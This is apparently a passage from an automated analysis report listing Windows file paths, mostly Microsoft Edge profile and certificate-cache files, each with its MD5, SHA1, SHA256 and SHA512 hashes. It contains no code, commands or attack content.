| SHA512 | a339d8c2117c9fa0c87e958fab03646de1294b06d9e328aaeab33a36db407e2e4d1328ea7561534dcd26ce6e1022fcf05d196eda8d0e87ddf30ae8df3d7059e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f5fb8e64c0e83e4ee07ec4d1669f5c3f |
| SHA1 | 2de6244e821dc8284e50d397b66f21aedf054ff7 |
| SHA256 | 92d1cbef255f6d1a4f1fce4bb9c07c3073af97fe40acb26770d9a5d4400f3fa5 |
| SHA512 | e9732ceafd8814d580708b3a10a87e60bbe5b2d35454dab3ef8100260e4b7555cdc7ead3c3489c6dc5194eaa18529626ecc11976f9968d81954b053946a56b34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c006463ab3e8f39f706737f13f3bc024 |
| SHA1 | cd504d61a2b3f3e646554ba91103ca7c7cfa8973 |
| SHA256 | 1f4e1f54e35e70ecc2d44e472acc608a028349f2f742e10a71a771804c719476 |
| SHA512 | 7628ba5b35f595f573142b6269262b291c4b0dcb824389c0a65e00deda4e5c98602e5b851b0caff4043b53426659ee7c9e3b13e7aeb20966621ff846e231417f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3c247b9f557029ecd5c8174dd742a4ec |
| SHA1 | 2c4a8869922636397184fcb9934de066b5141ef8 |
| SHA256 | 50d65e7e8e09d438bd326b787f1a8fe01c3e4d2f286e6dbb7bd81ee3edfe9081 |
| SHA512 | 86e421d7cc329d7af76c54a3f763f0c4924c35929f2bdf5d8eb3d5e33f8b214949b7bc6b515a50e2b32e2874d7f119971f09522f10b8f381c1a712494b9b3e59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5ac684be21f2a22f6c5edef443b76c5c |
| SHA1 | 75d989a26c0bc1e317d48df63e97544b6ea50cba |
| SHA256 | da4611c72a0933aa3e79e57d03f73a1f92c21dbf9bbc016565dc2e589a3b14ce |
| SHA512 | fbe58b0b826af1343c7d62a982a0768cf9672e4cffc1b0f367554f0598308e79eb8c8b22c83b2a378d9f2e3c3ddaf0a9fe2a7a6210865b5cb0be4de2119aa301 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5bdf02.TMP
| MD5 | 01775b7acf294d3e8b07cdb235a2795e |
| SHA1 | 6b9e8461e868f35daa56862f2bd33e328e1ca882 |
| SHA256 | 97c68f0b5bba25b1a15c067756c3770ef5198ef47f03225e9efe9ee824e15f9b |
| SHA512 | 0f35aef413eda94d3650b5da3153b0c70bcf0f22ccba1b335fd98bbf8e3dd00621289261e5a943c8978c828b5ec80134c196e0200c2cae26dcb42d71733a9d72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a8bcaa3849812129ad58382aab0ddb8d |
| SHA1 | c303a5725d846b2de9bdd6753ade02c2f1563957 |
| SHA256 | be0d2c8ade9babb0478d1bc1c5081fbe15522e9d42978346951db32e949f58dd |
| SHA512 | 70846ba1d1308dd2607be49af0871211f4bf7eee0217ceb4e948629cc7d5afefb2ce8a010af52549c93d33c54414403fa7afe7d5a1643d4d1b12b724a21b14cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fd63f234072a908eb86fb55d1a3bd0fe |
| SHA1 | 75650f576d029d8ae6e466acea94820360d13b64 |
| SHA256 | ce2cc2719ba6b15f53eb2a4b253b8a405790a7ce037da2d02df95a1101b4c639 |
| SHA512 | c9fa05d17e0ad66a1d285cd508d0e5400f294598b6c9668cc6178226f3c0d0c544a8d18bb5937aef22ac19005b012796a51e9c8ae05f6335ae26afc6e7851349 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e79bbf485050bc13787cfbb167f09207 |
| SHA1 | 1e630cdb6e3993e37ed225e5fa14ea0e4e1f0271 |
| SHA256 | 1b281fddab3038278b0c52ca1fb950bb710688d97be302bbcc5ce8049b27f6e3 |
| SHA512 | fb7efcd5926e34f03c4b3b2a8e8ed210c64256cea3587c907823a49b0449d5f6c9beca52afb367b81c540ff5d767ce3ace5911a63ed16a3b024de29d74a81aa5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 504e86efa22eea8edac2c3a2735325b5 |
| SHA1 | dd7a599429c27a8c9decd95eab2dac4297da31c3 |
| SHA256 | 560bf3e6be9f62f95ac620a2f36567405419bdceba6a80241f40cb5f0daa9339 |
| SHA512 | 782f83797d432dc5d0875f639ad2d1f090fc1c6d293ce72c974d40e26e922b0daff08713dd69dd84f071d33ff81cf875478af91cdfc58acb0a8add104e76b7db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1
| MD5 | 1d8f6f14289e73ecc4ab4d24ed89f314 |
| SHA1 | 4e7d0656f614a40d155c7e28bd4fd42b930351e0 |
| SHA256 | 2a9190d84198c324e26d76665a37ca910f358ccca9a9f1ec185113095e74f9c5 |
| SHA512 | 14520cbdbb7040b53d03387e8f175757c7f274b42bafd3af19b472ec06c812437cabcd22ca454780c764f69ab3dc6c31dfa979e55ef6afcc8b4afbcb12e89251 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
| MD5 | 88685024cd87ff04e9f90fecdd07a86a |
| SHA1 | 551e63af0270d789d4a07f7660523c5fbdfc7f75 |
| SHA256 | 0f1e70b76b0ede33e2466ab0e94d8d6712db6776d725243749185d9cb9c08862 |
| SHA512 | 3e7ba67de4be1e4e6ddc624a7c5cc69c7030f3ef8333a4d1464ff118f08777bfdce68eb2bf038b83f1631edd8be18e320a5854c06bc8d3e8e4bed0122f34e2bd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
| MD5 | af9c3bea2e7cabad2440c6859d02fe56 |
| SHA1 | 5b43d27db53f3c0150feebe35096151962a3d9e3 |
| SHA256 | 1bf827fc072b09101ea001847d8c6dd04bb293ef5a0887c60d2f28e4b6e193cf |
| SHA512 | 6ec7d2f7936c573af7c0dad1482bfa3efcc85d8f99c71e814e263d4d437af71f75f70cf56ae36087dca76d8b4c767aca79f2963e54c19fa31f7055fae198877b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | 9bcb47de41de2e83e0cac07c0c973819 |
| SHA1 | f46d67bf177c408304b7821c2c18d736a3f714f0 |
| SHA256 | e5f7de4f04e0f5ef9f1174caf0f68cca403c350414a1343f779d771d56107b1f |
| SHA512 | 0955d76dfea7f9396148022e1766e5b54778049815aeccd7ad6451cc647a3078c45f208faeb548788f3aae12ac66a32c9979472b1e5e8fbb0efe4f0ef3e0c527 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
| MD5 | 6349022b4ad9fcc551f2e6e405adb429 |
| SHA1 | e6e6d0677f70123e4d2551f73dc1df3ada9dae86 |
| SHA256 | b019bc822276bd4c1ef2f94ac1ce570ffda2ee40f35153ed218c92d9d12c1786 |
| SHA512 | 55e3c8b0a694462286a62da7d923f1d9cecfc0c2e623ace66f82434ed98fe86f3e6d02e2b868bd43e114285a7455e92fdb393a941c679837c9b569467ea5fa14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 605c6e6ca33357f48d1e32a0a0dfa783 |
| SHA1 | 38a9b0faef62221dab3dcaafa490a2d385346e51 |
| SHA256 | f50428ebfec008f30d544bcd733679ac80ab9d0b07a4219e2597ecb52d41db01 |
| SHA512 | f95eec5ea6e58c21fb607c283d6e9cfc1f48620371ff044d2aa689537606c757c661abe3fa0d01caa4ef03de92c545d8eacd341525f2417bcbb96baa6924b5da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 81dfa595d40efe351c6eb4affc347aed |
| SHA1 | 97900b613846dd34c131633fffee602ea3018e0c |
| SHA256 | 30a21b578fb01d793e4bc29ba4ff2702bb6e784986566a27f80ec0d77787f022 |
| SHA512 | 142da5b924807fb2f3fda9ad71f70cf780da3e8e78332fb70c59f77ff96fd5ad3551fb8a3c21fbc7f6c6abf9135974462e60e7b98046ad3eaf13adf4416e4e53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a7ec9125943d06fc4c75cc1e306c944c |
| SHA1 | 5c6e0c5ccd69e39bb5b3fe65160a49adfa1173c4 |
| SHA256 | 81b2ebd5acac360fea4f59e64b37e0b0603fae1026102a9a2e1c488c649ff6e0 |
| SHA512 | ee1ec82fe82c286ed30ab965b2bbe444d5d8c5db954b27c45018645a59c870d3ac290377dafe5bc83b0ed59b0d3a32292753c8789d3220c913644c2a8022afdb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a0d0957c0806bdfbc8cade16052c6b14 |
| SHA1 | 2464da47d71051f3c5c742054429b72831110fa6 |
| SHA256 | 670a720c2335b6c85d3ced16d5d66291dc57edddac65eec2e97008ef3c4a67a7 |
| SHA512 | fe9eed238ea36c91f18ab9e2456934b732ecd02a3a8f50b92f2ca954f8e9605f4773537a2bb0e8b372609bec36c9ab362a9bf7397f517eac22d77b38e653c93e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ce87a38d84d7a8f4679ee4756d519499 |
| SHA1 | 3e5efeff8c2025a303656b86182ec2eef2c299dc |
| SHA256 | 6842e16517d8cb6ffbe27a873c316f149f7fc3d033007739e532d6f5e0a05a99 |
| SHA512 | ee8195fdf4b6f9d19fd751da0fa6e02013c98bfb1891d71357bb14a02efd1caf3f1091d097ae900bad11793e0f10a7dc3bc73e532f8c5e1fd25727122052aa45 |
C:\Windows\INF\netrasa.PNF
| MD5 | be80e300446111aec64403d79f1273fe |
| SHA1 | 826037ffd3b2a6fefafd518fcd46b874048e570a |
| SHA256 | b3c3bcc6efcde0eb14c4bed7d0a51635384a5a33f6b9c3ffd97efec28a824798 |
| SHA512 | e67f7c010e3d71e2753e6a2c1b977b0acb54c0657e269baedab7d25c2e14371855d3fbe48daeb8aa5ef71c43e161f2857a695f24b736426c4c8de598e9f95459 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 51645e8814ccaa19adf3199e22ee8a30 |
| SHA1 | db02e26107fc3a34ed620735f0961d583c299a76 |
| SHA256 | 6343df4c7eef516c65d5cdfa2b57cdc62849dff485338b2179a91d7c38aa4d09 |
| SHA512 | 4b056eac811918eb30b1863b8c09a92df1b83616f9e52e2bfb5580d5efc04099597735ddb77858ee88e371f45f83b5e8f4817416f5396988aa94415151304aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 37ca8dc2d35d804e9bbfdc17ef1166b4 |
| SHA1 | 585a61e668ef8df70851e7c6e187fa1bdf203fbd |
| SHA256 | 1589c9134d5edb7ecfda97fa3f688d9ca5911c6df30da3c592736f66cfd150d4 |
| SHA512 | 3d6f5734991b64204a966933ffdd5dfda665ae68ac94b72bcd8a3010fa716986a626c320aba9279224c559f9e607146564bfd39f1d6163e9303bdda331daba1b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 7614ef6c7bbae12ac07d02d62356a5ad |
| SHA1 | 5c68c7f015221f77feaa264c929ab239a2a749d6 |
| SHA256 | 186e855b939de9f4f636d897d5414e552e1cfab15f3aefb3bba262d799ffaa61 |
| SHA512 | 389c05fefb3af406994f983e93d09db449277c09c7ee577dec771858e843bd9a225bf2add38c3a52799fe35c01efb9a7676895005748a94486bc6fca0e879997 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 6cb8c22687ab2c915156b98e2abea95f |
| SHA1 | f41c15ddeb3dc39aa620ff0c9e003123a83d1db2 |
| SHA256 | e08a58e62b12a0047815bb074f8fb8b9a3cb140432e1e7d45d7904f3039e986d |
| SHA512 | 7f763ef6ab9f4ef2cf9b125f5040b85a2d1fd205000c5f44520a3182b49cd0d3377df58f90e5eb340bd5d64cd49e1b910a97c5bfae8429a11ab28057a36cd305 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 6387f9645b0e7fd5985664ad93d02f2f |
| SHA1 | 1b1a57eeae38410b66f90c0fda39b68491b37459 |
| SHA256 | 7ffc84bbe13d258753b8b0068980ee356077bf255929a5b554e6e3d69ff73aa2 |
| SHA512 | 825e289c6eb65bdf53068bcbe8d35ab57f25203b25776859fdbf02482607846ec966f5b93a365079519d3fbc593eec435c7384caff83e8045549546bfd11648c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | a78885dc856faeb57c7549a4b25d6a6a |
| SHA1 | 62cd1234f65a694281b47fb54f6aeb300d023093 |
| SHA256 | d586a36a410c287a57fb08f3e0e137f7fa66a303aaa86396c72b81f6abad2c63 |
| SHA512 | f41c11f88c04a6f3c8fa528c199790ed701d4f5577820881d29d78f239d03171962942deaa8e53320d83784d77a013d243f84b8f4bcd47fb97e056a197f2093b |